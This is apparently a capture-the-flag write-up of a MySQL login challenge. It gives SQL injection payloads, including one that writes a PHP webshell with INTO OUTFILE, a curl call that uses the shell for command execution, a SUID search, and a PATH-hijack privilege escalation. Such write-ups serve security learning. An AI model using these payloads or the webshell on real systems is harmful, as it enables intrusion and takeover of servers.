Overview
The challenge presented a login portal running on MySQL. After initial recon we identified a classic blind SQL injection in the username parameter. The real fun started when we found file write privileges enabled via secure_file_priv.
Enumeration
Starting with a basic boolean-based payload to confirm injectable:
1
' OR 1=1-- -
Response changes confirmed injection. Next, enumerate the database version:
1
' AND SUBSTRING(VERSION(),1,1)='5'-- -
Exploitation
With file write confirmed, we dropped a PHP webshell:
1
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
Then triggered RCE:
1
2
curl "http://target/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)
Privilege Escalation
From there, a quick SUID binary enum:
1
find / -perm -4000 2>/dev/null
Found a custom binary at /opt/checker. Reversed it with strings and noticed it called system("cat /flag") without a full path — classic PATH hijack.
1
2
3
4
export PATH=/tmp:$PATH
echo '#!/bin/bash\ncat /root/flag.txt' > /tmp/cat
chmod +x /tmp/cat
/opt/checker
Flag captured.